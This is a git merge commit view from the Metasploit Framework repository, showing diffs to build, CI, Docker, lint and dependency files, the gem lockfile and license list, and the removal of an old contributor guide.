Merge pull request #1 from bwatters-r7/prep-8509

bypassuac_injection_winsxs updates and documents
bug/bundler_fix
Ernesto Fernandez 2017-10-11 11:43:57 +02:00 committed by GitHub
commit 32eb1e9fe6
3849 changed files with 31213 additions and 14807 deletions

View File

@ -90,7 +90,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from # Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality, # private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download # check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for # Avoid checking in metakitty, the source for

3
.gitignore vendored
View File

@ -78,7 +78,7 @@ data/java
# Avoid checking in Meterpreter libs that are built from # Avoid checking in Meterpreter libs that are built from
# private source. If you're interested in this functionality, # private source. If you're interested in this functionality,
# check out Metasploit Pro: http://metasploit.com/download # check out Metasploit Pro: https://metasploit.com/download
data/meterpreter/ext_server_pivot.*.dll data/meterpreter/ext_server_pivot.*.dll
# Avoid checking in metakitty, the source for # Avoid checking in metakitty, the source for
@ -91,3 +91,4 @@ docker-compose.local*
# Ignore python bytecode # Ignore python bytecode
*.pyc *.pyc
rspec.failures

View File

@ -8,18 +8,57 @@
# inherit_from: .rubocop_todo.yml # inherit_from: .rubocop_todo.yml
AllCops:
TargetRubyVersion: 2.2
Metrics/ClassLength: Metrics/ClassLength:
Description: 'Most Metasploit modules are quite large. This is ok.' Description: 'Most Metasploit modules are quite large. This is ok.'
Enabled: true Enabled: true
Exclude: Exclude:
- 'modules/**/*' - 'modules/**/*'
Metrics/AbcSize:
Enabled: false
Description: 'This is often a red-herring'
Metrics/CyclomaticComplexity:
Enabled: false
Description: 'This is often a red-herring'
Metrics/PerceivedComplexity:
Enabled: false
Description: 'This is often a red-herring'
Style/FrozenStringLiteralComment:
Enabled: false
Description: 'We cannot support this yet without a lot of things breaking'
Style/RedundantReturn:
Description: 'This often looks weird when mixed with actual returns, and hurts nothing'
Enabled: false
Style/Documentation: Style/Documentation:
Enabled: true Enabled: true
Description: 'Most Metasploit modules do not have class documentation.' Description: 'Most Metasploit modules do not have class documentation.'
Exclude: Exclude:
- 'modules/**/*' - 'modules/**/*'
Layout/IndentHeredoc:
Enabled: false
Description: 'We need to leave this disabled for Ruby 2.2 compat, remove in 2018'
Style/GuardClause:
Enabled: false
Description: 'This often introduces bugs in tested code'
Style/NegatedIf:
Enabled: false
Description: 'This often introduces bugs in tested code'
Style/ConditionalAssignment:
Enabled: false
Description: 'This is confusing for folks coming from other languages'
Style/Encoding: Style/Encoding:
Enabled: true Enabled: true
Description: 'We prefer binary to UTF-8.' Description: 'We prefer binary to UTF-8.'
@ -53,7 +92,7 @@ Style/NumericLiterals:
Enabled: false Enabled: false
Description: 'This often hurts readability for exploit-ish code.' Description: 'This often hurts readability for exploit-ish code.'
Style/SpaceInsideBrackets: Layout/SpaceInsideBrackets:
Enabled: false Enabled: false
Description: 'Until module template are final, most modules will fail this.' Description: 'Until module template are final, most modules will fail this.'

View File

@ -1 +1 @@
2.4.1 2.4.2

View File

@ -12,20 +12,24 @@ addons:
language: ruby language: ruby
rvm: rvm:
- '2.2' - '2.2'
- '2.3.4' - '2.3.5'
- '2.4.1' - '2.4.2'
env: env:
# TODO: restore these tests when the code passes them! - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"'
# - CMD='bundle exec rake cucumber cucumber:boot CREATE_BINSTUBS=true' - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag ~content"'
- CMD='bundle exec rake spec SPEC_OPTS="--tag content"'
- CMD='bundle exec rake spec SPEC_OPTS="--tag ~content"'
matrix: matrix:
fast_finish: true fast_finish: true
jobs:
# build docker image
include: include:
- rvm: ruby-head - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true"
env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" # we do not need any setup
before_install: skip
install: skip
before_script: skip
before_install: before_install:
- "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc" - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc"
- rake --version - rake --version
@ -44,7 +48,8 @@ before_script:
- git diff --exit-code db/schema.rb - git diff --exit-code db/schema.rb
script: script:
- echo "${CMD}" - echo "${CMD}"
- bash -c "${CMD}" # we need travis_wait because the Docker build job can take longer than 10 minutes
- if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi
notifications: notifications:
irc: "irc.freenode.org#msfnotify" irc: "irc.freenode.org#msfnotify"

View File

@ -2,7 +2,7 @@
--exclude samples/ --exclude samples/
--exclude \.ut\.rb/ --exclude \.ut\.rb/
--exclude \.ts\.rb/ --exclude \.ts\.rb/
--files CONTRIBUTING.md,COPYING,HACKING,LICENSE --files CONTRIBUTING.md,COPYING,LICENSE
app/**/*.rb app/**/*.rb
lib/msf/**/*.rb lib/msf/**/*.rb
lib/metasploit/**/*.rb lib/metasploit/**/*.rb

View File

@ -119,4 +119,4 @@ already way ahead of the curve, so keep it up!
[YARD]:http://yardoc.org [YARD]:http://yardoc.org
[Issues]:https://github.com/rapid7/metasploit-framework/issues [Issues]:https://github.com/rapid7/metasploit-framework/issues
[Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4 [Freenode IRC channel]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
[metasploit-hackers]:https://lists.sourceforge.net/lists/listinfo/metasploit-hackers [metasploit-hackers]:https://groups.google.com/forum/#!forum/metasploit-hackers

View File

@ -1,4 +1,4 @@
FROM ruby:2.4.1-alpine FROM ruby:2.4.2-alpine
MAINTAINER Rapid7 MAINTAINER Rapid7
ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@ -24,7 +24,6 @@ RUN apk update && \
bison \ bison \
build-base \ build-base \
ruby-dev \ ruby-dev \
libffi-dev\
openssl-dev \ openssl-dev \
readline-dev \ readline-dev \
sqlite-dev \ sqlite-dev \
@ -35,15 +34,14 @@ RUN apk update && \
yaml-dev \ yaml-dev \
zlib-dev \ zlib-dev \
ncurses-dev \ ncurses-dev \
git \
&& echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
&& gem update --system \
&& gem install bundler \
&& bundle install --system $BUNDLER_ARGS \ && bundle install --system $BUNDLER_ARGS \
&& apk del .ruby-builddeps \ && apk del .ruby-builddeps \
&& rm -rf /var/cache/apk/* && rm -rf /var/cache/apk/*
# fix for robots gem not readable (known bug)
# https://github.com/rapid7/metasploit-framework/issues/6068
RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb
RUN adduser -g msfconsole -D $MSF_USER RUN adduser -g msfconsole -D $MSF_USER
RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby) RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)

10
Gemfile
View File

@ -18,9 +18,9 @@ group :development do
gem 'pry' gem 'pry'
# module documentation # module documentation
gem 'octokit' gem 'octokit'
# metasploit-aggregator as a framework only option for now
# Metasploit::Aggregator external session proxy # Metasploit::Aggregator external session proxy
gem 'metasploit-aggregator' # Disabled for now for crypttlv updates
# gem 'metasploit-aggregator'
end end
group :development, :test do group :development, :test do
@ -33,14 +33,10 @@ group :development, :test do
# Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the # Define `rake spec`. Must be in development AND test so that its available by default as a rake test when the
# environment is development # environment is development
gem 'rspec-rails' gem 'rspec-rails'
gem 'rspec-rerun'
end end
group :test do group :test do
# cucumber extension for testing command line applications, like msfconsole
gem 'aruba'
# cucumber + automatic database cleaning with database_cleaner
gem 'cucumber-rails', :require => false
gem 'shoulda-matchers'
# Manipulate Time.now in specs # Manipulate Time.now in specs
gem 'timecop' gem 'timecop'
end end

View File

@ -1,13 +1,15 @@
PATH PATH
remote: . remote: .
specs: specs:
metasploit-framework (4.14.25) metasploit-framework (4.16.11)
actionpack (~> 4.2.6) actionpack (~> 4.2.6)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
backports backports
bcrypt bcrypt
bcrypt_pbkdf
bit-struct bit-struct
dnsruby
filesize filesize
jsobfu jsobfu
json json
@ -15,9 +17,9 @@ PATH
metasploit-concern metasploit-concern
metasploit-credential metasploit-credential
metasploit-model metasploit-model
metasploit-payloads (= 1.2.29) metasploit-payloads (= 1.3.9)
metasploit_data_models metasploit_data_models
metasploit_payloads-mettle (= 0.1.9) metasploit_payloads-mettle (= 0.2.2)
msgpack msgpack
nessus_rest nessus_rest
net-ssh net-ssh
@ -30,9 +32,12 @@ PATH
packetfu packetfu
patch_finder patch_finder
pcaprub pcaprub
pg pdf-reader
pg (= 0.20.0)
railties railties
rb-readline rb-readline
rbnacl (< 5.0.0)
rbnacl-libsodium
recog recog
redcarpet redcarpet
rex-arch rex-arch
@ -44,7 +49,7 @@ PATH
rex-mime rex-mime
rex-nop rex-nop
rex-ole rex-ole
rex-powershell rex-powershell (< 0.1.73)
rex-random_identifier rex-random_identifier
rex-registry rex-registry
rex-rop_builder rex-rop_builder
@ -53,7 +58,6 @@ PATH
rex-struct2 rex-struct2
rex-text rex-text
rex-zip rex-zip
robots
ruby_smb ruby_smb
rubyntlm rubyntlm
rubyzip rubyzip
@ -62,141 +66,94 @@ PATH
tzinfo tzinfo
tzinfo-data tzinfo-data
windows_error windows_error
xdr
xmlrpc xmlrpc
GEM GEM
remote: https://rubygems.org/ remote: https://rubygems.org/
specs: specs:
actionpack (4.2.8) Ascii85 (1.0.2)
actionview (= 4.2.8) actionpack (4.2.10)
activesupport (= 4.2.8) actionview (= 4.2.10)
activesupport (= 4.2.10)
rack (~> 1.6) rack (~> 1.6)
rack-test (~> 0.6.2) rack-test (~> 0.6.2)
rails-dom-testing (~> 1.0, >= 1.0.5) rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.2) rails-html-sanitizer (~> 1.0, >= 1.0.2)
actionview (4.2.8) actionview (4.2.10)
activesupport (= 4.2.8) activesupport (= 4.2.10)
builder (~> 3.1) builder (~> 3.1)
erubis (~> 2.7.0) erubis (~> 2.7.0)
rails-dom-testing (~> 1.0, >= 1.0.5) rails-dom-testing (~> 1.0, >= 1.0.5)
rails-html-sanitizer (~> 1.0, >= 1.0.3) rails-html-sanitizer (~> 1.0, >= 1.0.3)
activemodel (4.2.8) activemodel (4.2.10)
activesupport (= 4.2.8) activesupport (= 4.2.10)
builder (~> 3.1) builder (~> 3.1)
activerecord (4.2.8) activerecord (4.2.10)
activemodel (= 4.2.8) activemodel (= 4.2.10)
activesupport (= 4.2.8) activesupport (= 4.2.10)
arel (~> 6.0) arel (~> 6.0)
activesupport (4.2.8) activesupport (4.2.10)
i18n (~> 0.7) i18n (~> 0.7)
minitest (~> 5.1) minitest (~> 5.1)
thread_safe (~> 0.3, >= 0.3.4) thread_safe (~> 0.3, >= 0.3.4)
tzinfo (~> 1.1) tzinfo (~> 1.1)
addressable (2.5.1) addressable (2.5.2)
public_suffix (~> 2.0, >= 2.0.2) public_suffix (>= 2.0.2, < 4.0)
afm (0.2.2)
arel (6.0.4) arel (6.0.4)
arel-helpers (2.4.0) arel-helpers (2.4.0)
activerecord (>= 3.1.0, < 6) activerecord (>= 3.1.0, < 6)
aruba (0.14.2)
childprocess (~> 0.5.6)
contracts (~> 0.9)
cucumber (>= 1.3.19)
ffi (~> 1.9.10)
rspec-expectations (>= 2.99)
thor (~> 0.19)
backports (3.8.0) backports (3.8.0)
bcrypt (3.1.11) bcrypt (3.1.11)
bindata (2.4.0) bcrypt_pbkdf (1.0.0)
bindata (2.4.1)
bit-struct (0.16) bit-struct (0.16)
builder (3.2.3) builder (3.2.3)
capybara (2.14.0) coderay (1.1.2)
addressable crass (1.0.2)
mime-types (>= 1.16)
nokogiri (>= 1.3.3)
rack (>= 1.0.0)
rack-test (>= 0.5.4)
xpath (~> 2.0)
childprocess (0.5.9)
ffi (~> 1.0, >= 1.0.11)
coderay (1.1.1)
contracts (0.16.0)
cucumber (2.4.0)
builder (>= 2.1.2)
cucumber-core (~> 1.5.0)
cucumber-wire (~> 0.0.1)
diff-lcs (>= 1.1.3)
gherkin (~> 4.0)
multi_json (>= 1.7.5, < 2.0)
multi_test (>= 0.1.2)
cucumber-core (1.5.0)
gherkin (~> 4.0)
cucumber-rails (1.5.0)
capybara (>= 1.1.2, < 3)
cucumber (>= 1.3.8, < 4)
mime-types (>= 1.17, < 4)
nokogiri (~> 1.5)
railties (>= 4, < 5.2)
cucumber-wire (0.0.1)
diff-lcs (1.3) diff-lcs (1.3)
dnsruby (1.60.2)
docile (1.1.5) docile (1.1.5)
erubis (2.7.0) erubis (2.7.0)
factory_girl (4.8.0) factory_girl (4.8.1)
activesupport (>= 3.0.0) activesupport (>= 3.0.0)
factory_girl_rails (4.8.0) factory_girl_rails (4.8.0)
factory_girl (~> 4.8.0) factory_girl (~> 4.8.0)
railties (>= 3.0.0) railties (>= 3.0.0)
faraday (0.12.1) faraday (0.13.1)
multipart-post (>= 1.2, < 3) multipart-post (>= 1.2, < 3)
ffi (1.9.18) ffi (1.9.18)
filesize (0.1.1) filesize (0.1.1)
fivemat (1.3.4) fivemat (1.3.5)
gherkin (4.1.3) hashery (2.1.2)
google-protobuf (3.3.0) i18n (0.8.6)
googleauth (0.5.1)
faraday (~> 0.9)
jwt (~> 1.4)
logging (~> 2.0)
memoist (~> 0.12)
multi_json (~> 1.11)
os (~> 0.9)
signet (~> 0.7)
grpc (1.3.4)
google-protobuf (~> 3.1)
googleauth (~> 0.5.1)
i18n (0.8.4)
jsobfu (0.4.2) jsobfu (0.4.2)
rkelly-remix rkelly-remix
json (2.1.0) json (2.1.0)
jwt (1.5.6) loofah (2.1.1)
little-plugger (1.1.4) crass (~> 1.0.2)
logging (2.2.2)
little-plugger (~> 1.1)
multi_json (~> 1.10)
loofah (2.0.3)
nokogiri (>= 1.5.9) nokogiri (>= 1.5.9)
memoist (0.15.0)
metasm (1.0.3) metasm (1.0.3)
metasploit-aggregator (0.2.1) metasploit-concern (2.0.5)
grpc
rex-arch
metasploit-concern (2.0.4)
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-credential (2.0.9) metasploit-credential (2.0.12)
metasploit-concern metasploit-concern
metasploit-model metasploit-model
metasploit_data_models metasploit_data_models
pg pg
railties railties
rex-socket
rubyntlm rubyntlm
rubyzip rubyzip
metasploit-model (2.0.4) metasploit-model (2.0.4)
activemodel (~> 4.2.6) activemodel (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
railties (~> 4.2.6) railties (~> 4.2.6)
metasploit-payloads (1.2.29) metasploit-payloads (1.3.9)
metasploit_data_models (2.0.14) metasploit_data_models (2.0.15)
activerecord (~> 4.2.6) activerecord (~> 4.2.6)
activesupport (~> 4.2.6) activesupport (~> 4.2.6)
arel-helpers arel-helpers
@ -206,43 +163,42 @@ GEM
postgres_ext postgres_ext
railties (~> 4.2.6) railties (~> 4.2.6)
recog (~> 2.0) recog (~> 2.0)
metasploit_payloads-mettle (0.1.9) metasploit_payloads-mettle (0.2.2)
method_source (0.8.2) method_source (0.9.0)
mime-types (3.1) mini_portile2 (2.3.0)
mime-types-data (~> 3.2015) minitest (5.10.3)
mime-types-data (3.2016.0521)
mini_portile2 (2.1.0)
minitest (5.10.2)
msgpack (1.1.0) msgpack (1.1.0)
multi_json (1.12.1)
multi_test (0.1.2)
multipart-post (2.0.0) multipart-post (2.0.0)
nessus_rest (0.1.6) nessus_rest (0.1.6)
net-ssh (4.1.0) net-ssh (4.2.0)
network_interface (0.0.1) network_interface (0.0.2)
nexpose (6.0.0) nexpose (7.1.1)
nokogiri (1.7.2) nokogiri (1.8.1)
mini_portile2 (~> 2.1.0) mini_portile2 (~> 2.3.0)
octokit (4.7.0) octokit (4.7.0)
sawyer (~> 0.8.0, >= 0.5.3) sawyer (~> 0.8.0, >= 0.5.3)
openssl-ccm (1.2.1) openssl-ccm (1.2.1)
openvas-omp (0.0.4) openvas-omp (0.0.4)
os (0.9.6)
packetfu (1.1.13) packetfu (1.1.13)
pcaprub pcaprub
patch_finder (1.0.2) patch_finder (1.0.2)
pcaprub (0.12.4) pcaprub (0.12.4)
pdf-reader (2.0.0)
Ascii85 (~> 1.0.0)
afm (~> 0.2.1)
hashery (~> 2.0)
ruby-rc4
ttfunk
pg (0.20.0) pg (0.20.0)
pg_array_parser (0.0.9) pg_array_parser (0.0.9)
postgres_ext (3.0.0) postgres_ext (3.0.0)
activerecord (>= 4.0.0) activerecord (>= 4.0.0)
arel (>= 4.0.1) arel (>= 4.0.1)
pg_array_parser (~> 0.0.9) pg_array_parser (~> 0.0.9)
pry (0.10.4) pry (0.11.1)
coderay (~> 1.1.0) coderay (~> 1.1.0)
method_source (~> 0.8.1) method_source (~> 0.9.0)
slop (~> 3.4) public_suffix (3.0.0)
public_suffix (2.0.5)
rack (1.6.8) rack (1.6.8)
rack-test (0.6.3) rack-test (0.6.3)
rack (>= 1.0) rack (>= 1.0)
@ -254,25 +210,29 @@ GEM
rails-deprecated_sanitizer (>= 1.0.1) rails-deprecated_sanitizer (>= 1.0.1)
rails-html-sanitizer (1.0.3) rails-html-sanitizer (1.0.3)
loofah (~> 2.0) loofah (~> 2.0)
railties (4.2.8) railties (4.2.10)
actionpack (= 4.2.8) actionpack (= 4.2.10)
activesupport (= 4.2.8) activesupport (= 4.2.10)
rake (>= 0.8.7) rake (>= 0.8.7)
thor (>= 0.18.1, < 2.0) thor (>= 0.18.1, < 2.0)
rake (12.0.0) rake (12.1.0)
rb-readline (0.5.4) rb-readline (0.5.5)
recog (2.1.8) rbnacl (4.0.2)
ffi
rbnacl-libsodium (1.0.13)
rbnacl (>= 3.0.1)
recog (2.1.15)
nokogiri nokogiri
redcarpet (3.4.0) redcarpet (3.4.0)
rex-arch (0.1.8) rex-arch (0.1.11)
rex-text rex-text
rex-bin_tools (0.1.3) rex-bin_tools (0.1.4)
metasm metasm
rex-arch rex-arch
rex-core rex-core
rex-struct2 rex-struct2
rex-text rex-text
rex-core (0.1.10) rex-core (0.1.12)
rex-encoder (0.1.4) rex-encoder (0.1.4)
metasm metasm
rex-arch rex-arch
@ -293,16 +253,17 @@ GEM
rex-powershell (0.1.72) rex-powershell (0.1.72)
rex-random_identifier rex-random_identifier
rex-text rex-text
rex-random_identifier (0.1.2) rex-random_identifier (0.1.4)
rex-text rex-text
rex-registry (0.1.3) rex-registry (0.1.3)
rex-rop_builder (0.1.3) rex-rop_builder (0.1.3)
metasm metasm
rex-core rex-core
rex-text rex-text
rex-socket (0.1.6) rex-socket (0.1.8)
rex-core
rex-sslscan (0.1.5)
rex-core rex-core
rex-sslscan (0.1.4)
rex-socket rex-socket
rex-text rex-text
rex-struct2 (0.1.2) rex-struct2 (0.1.2)
@ -310,7 +271,10 @@ GEM
rex-zip (0.1.3) rex-zip (0.1.3)
rex-text rex-text
rkelly-remix (0.0.7) rkelly-remix (0.0.7)
robots (0.10.1) rspec (3.6.0)
rspec-core (~> 3.6.0)
rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0)
rspec-core (3.6.0) rspec-core (3.6.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.6.0)
rspec-expectations (3.6.0) rspec-expectations (3.6.0)
@ -319,7 +283,7 @@ GEM
rspec-mocks (3.6.0) rspec-mocks (3.6.0)
diff-lcs (>= 1.2.0, < 2.0) diff-lcs (>= 1.2.0, < 2.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.6.0)
rspec-rails (3.6.0) rspec-rails (3.6.1)
actionpack (>= 3.0) actionpack (>= 3.0)
activesupport (>= 3.0) activesupport (>= 3.0)
railties (>= 3.0) railties (>= 3.0)
@ -327,7 +291,10 @@ GEM
rspec-expectations (~> 3.6.0) rspec-expectations (~> 3.6.0)
rspec-mocks (~> 3.6.0) rspec-mocks (~> 3.6.0)
rspec-support (~> 3.6.0) rspec-support (~> 3.6.0)
rspec-rerun (1.1.0)
rspec (~> 3.0)
rspec-support (3.6.0) rspec-support (3.6.0)
ruby-rc4 (0.1.5)
ruby_smb (0.0.18) ruby_smb (0.0.18)
bindata bindata
rubyntlm rubyntlm
@ -337,53 +304,44 @@ GEM
sawyer (0.8.1) sawyer (0.8.1)
addressable (>= 2.3.5, < 2.6) addressable (>= 2.3.5, < 2.6)
faraday (~> 0.8, < 1.0) faraday (~> 0.8, < 1.0)
shoulda-matchers (3.1.1) simplecov (0.15.1)
activesupport (>= 4.0.0)
signet (0.7.3)
addressable (~> 2.3)
faraday (~> 0.9)
jwt (~> 1.5)
multi_json (~> 1.10)
simplecov (0.14.1)
docile (~> 1.1.0) docile (~> 1.1.0)
json (>= 1.8, < 3) json (>= 1.8, < 3)
simplecov-html (~> 0.10.0) simplecov-html (~> 0.10.0)
simplecov-html (0.10.1) simplecov-html (0.10.2)
slop (3.6.0)
sqlite3 (1.3.13) sqlite3 (1.3.13)
sshkey (1.9.0) sshkey (1.9.0)
thor (0.19.4) thor (0.20.0)
thread_safe (0.3.6) thread_safe (0.3.6)
timecop (0.8.1) timecop (0.9.1)
ttfunk (1.5.1)
tzinfo (1.2.3) tzinfo (1.2.3)
thread_safe (~> 0.1) thread_safe (~> 0.1)
tzinfo-data (1.2017.2) tzinfo-data (1.2017.2)
tzinfo (>= 1.0.0) tzinfo (>= 1.0.0)
windows_error (0.1.2) windows_error (0.1.2)
xdr (2.0.0)
activemodel (>= 4.2.7)
activesupport (>= 4.2.7)
xmlrpc (0.3.0) xmlrpc (0.3.0)
xpath (2.1.0)
nokogiri (~> 1.3)
yard (0.9.9) yard (0.9.9)
PLATFORMS PLATFORMS
ruby ruby
DEPENDENCIES DEPENDENCIES
aruba
cucumber-rails
factory_girl_rails factory_girl_rails
fivemat fivemat
metasploit-aggregator
metasploit-framework! metasploit-framework!
octokit octokit
pry pry
rake rake
redcarpet redcarpet
rspec-rails rspec-rails
shoulda-matchers rspec-rerun
simplecov simplecov
timecop timecop
yard yard
BUNDLED WITH BUNDLED WITH
1.15.1 1.15.4

38
HACKING
View File

@ -1,38 +0,0 @@
HACKING
=======
(Last updated: 2014-03-04)
This document almost entirely deprecated by:
CONTRIBUTING.md
in the same directory as this file, and to a lesser extent:
The Metasploit Development Environment
https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
Common Coding Mistakes
https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes
The Ruby Style Guide
https://github.com/bbatsov/ruby-style-guide
Ruby 1.9: What to Expect
http://slideshow.rubyforge.org/ruby19.html
You can use the the "./tools/msftidy.rb" script against your new and
changed modules to do some rudimentary checking for various style and
syntax violations.
Licensing for Your New Content
==============================
By submitting code contributions to the Metasploit Project it is
assumed that you are offering your code under the Metasploit License
or similar 3-clause BSD-compatible license. MIT and Ruby Licenses
are also fine. We specifically cannot include GPL code. LGPL code
is accepted on a case by case basis for libraries only and is never
accepted for modules.

View File

@ -1,71 +1,62 @@
This file is auto-generated by tools/dev/update_gem_licenses.sh This file is auto-generated by tools/dev/update_gem_licenses.sh
actionpack, 4.2.8, MIT Ascii85, 1.0.2, MIT
actionview, 4.2.8, MIT actionpack, 4.2.9, MIT
activemodel, 4.2.8, MIT actionview, 4.2.9, MIT
activerecord, 4.2.8, MIT activemodel, 4.2.9, MIT
activesupport, 4.2.8, MIT activerecord, 4.2.9, MIT
activesupport, 4.2.9, MIT
addressable, 2.5.1, "Apache 2.0" addressable, 2.5.1, "Apache 2.0"
afm, 0.2.2, MIT
arel, 6.0.4, MIT arel, 6.0.4, MIT
arel-helpers, 2.4.0, unknown arel-helpers, 2.4.0, unknown
aruba, 0.14.2, MIT
backports, 3.8.0, MIT backports, 3.8.0, MIT
bcrypt, 3.1.11, MIT bcrypt, 3.1.11, MIT
bindata, 2.4.0, ruby bindata, 2.4.0, ruby
bit-struct, 0.16, ruby bit-struct, 0.16, ruby
builder, 3.2.3, MIT builder, 3.2.3, MIT
bundler, 1.15.0, MIT bundler, 1.15.1, MIT
capybara, 2.14.0, MIT
childprocess, 0.5.9, MIT
coderay, 1.1.1, MIT coderay, 1.1.1, MIT
contracts, 0.16.0, "Simplified BSD"
cucumber, 2.4.0, MIT
cucumber-core, 1.5.0, MIT
cucumber-rails, 1.5.0, MIT
cucumber-wire, 0.0.1, MIT
diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+" diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
dnsruby, 1.60.1, "Apache 2.0"
docile, 1.1.5, MIT docile, 1.1.5, MIT
erubis, 2.7.0, MIT erubis, 2.7.0, MIT
factory_girl, 4.8.0, MIT factory_girl, 4.8.0, MIT
factory_girl_rails, 4.8.0, MIT factory_girl_rails, 4.8.0, MIT
faraday, 0.12.1, MIT faraday, 0.12.1, MIT
ffi, 1.9.18, "New BSD"
filesize, 0.1.1, MIT filesize, 0.1.1, MIT
fivemat, 1.3.3, MIT fivemat, 1.3.5, MIT
gherkin, 4.1.3, MIT
google-protobuf, 3.3.0, "New BSD" google-protobuf, 3.3.0, "New BSD"
googleauth, 0.5.1, "Apache 2.0" googleauth, 0.5.1, "Apache 2.0"
grpc, 1.3.4, "New BSD" grpc, 1.4.1, "New BSD"
i18n, 0.8.1, MIT hashery, 2.1.2, "Simplified BSD"
i18n, 0.8.6, MIT
jsobfu, 0.4.2, "New BSD" jsobfu, 0.4.2, "New BSD"
json, 2.1.0, ruby json, 2.1.0, ruby
jwt, 1.5.6, MIT jwt, 1.5.6, MIT
little-plugger, 1.1.4, MIT little-plugger, 1.1.4, MIT
logging, 2.2.2, MIT logging, 2.2.2, MIT
loofah, 2.0.3, MIT loofah, 2.0.3, MIT
memoist, 0.15.0, MIT memoist, 0.16.0, MIT
metasm, 1.0.3, LGPL metasm, 1.0.3, LGPL
metasploit-aggregator, 0.2.1, "New BSD" metasploit-aggregator, 0.2.1, "New BSD"
metasploit-concern, 2.0.4, "New BSD" metasploit-concern, 2.0.5, "New BSD"
metasploit-credential, 2.0.9, "New BSD" metasploit-credential, 2.0.10, "New BSD"
metasploit-framework, 4.14.23, "New BSD" metasploit-framework, 4.15.0, "New BSD"
metasploit-model, 2.0.4, "New BSD" metasploit-model, 2.0.4, "New BSD"
metasploit-payloads, 1.2.29, "3-clause (or ""modified"") BSD" metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
metasploit_data_models, 2.0.14, "New BSD" metasploit_data_models, 2.0.15, "New BSD"
metasploit_payloads-mettle, 0.1.9, "3-clause (or ""modified"") BSD" metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
method_source, 0.8.2, MIT method_source, 0.8.2, MIT
mime-types, 3.1, MIT mini_portile2, 2.2.0, MIT
mime-types-data, 3.2016.0521, MIT
mini_portile2, 2.1.0, MIT
minitest, 5.10.2, MIT minitest, 5.10.2, MIT
msgpack, 1.1.0, "Apache 2.0" msgpack, 1.1.0, "Apache 2.0"
multi_json, 1.12.1, MIT multi_json, 1.12.1, MIT
multi_test, 0.1.2, MIT
multipart-post, 2.0.0, MIT multipart-post, 2.0.0, MIT
nessus_rest, 0.1.6, MIT nessus_rest, 0.1.6, MIT
net-ssh, 4.1.0, MIT net-ssh, 4.1.0, MIT
network_interface, 0.0.1, MIT network_interface, 0.0.1, MIT
nexpose, 6.0.0, BSD nexpose, 6.1.0, BSD
nokogiri, 1.7.2, MIT nokogiri, 1.8.0, MIT
octokit, 4.7.0, MIT octokit, 4.7.0, MIT
openssl-ccm, 1.2.1, MIT openssl-ccm, 1.2.1, MIT
openvas-omp, 0.0.4, MIT openvas-omp, 0.0.4, MIT
@ -73,6 +64,7 @@ os, 0.9.6, MIT
packetfu, 1.1.13, BSD packetfu, 1.1.13, BSD
patch_finder, 1.0.2, "New BSD" patch_finder, 1.0.2, "New BSD"
pcaprub, 0.12.4, LGPL-2.1 pcaprub, 0.12.4, LGPL-2.1
pdf-reader, 2.0.0, MIT
pg, 0.20.0, "New BSD" pg, 0.20.0, "New BSD"
pg_array_parser, 0.0.9, unknown pg_array_parser, 0.0.9, unknown
postgres_ext, 3.0.0, MIT postgres_ext, 3.0.0, MIT
@ -83,14 +75,14 @@ rack-test, 0.6.3, MIT
rails-deprecated_sanitizer, 1.0.3, MIT rails-deprecated_sanitizer, 1.0.3, MIT
rails-dom-testing, 1.0.8, MIT rails-dom-testing, 1.0.8, MIT
rails-html-sanitizer, 1.0.3, MIT rails-html-sanitizer, 1.0.3, MIT
railties, 4.2.8, MIT railties, 4.2.9, MIT
rake, 12.0.0, MIT rake, 12.0.0, MIT
rb-readline, 0.5.4, BSD rb-readline, 0.5.4, BSD
recog, 2.1.8, unknown recog, 2.1.11, unknown
redcarpet, 3.4.0, MIT redcarpet, 3.4.0, MIT
rex-arch, 0.1.4, "New BSD" rex-arch, 0.1.9, "New BSD"
rex-bin_tools, 0.1.3, "New BSD" rex-bin_tools, 0.1.4, "New BSD"
rex-core, 0.1.10, "New BSD" rex-core, 0.1.11, "New BSD"
rex-encoder, 0.1.4, "New BSD" rex-encoder, 0.1.4, "New BSD"
rex-exploitation, 0.1.14, "New BSD" rex-exploitation, 0.1.14, "New BSD"
rex-java, 0.1.5, "New BSD" rex-java, 0.1.5, "New BSD"
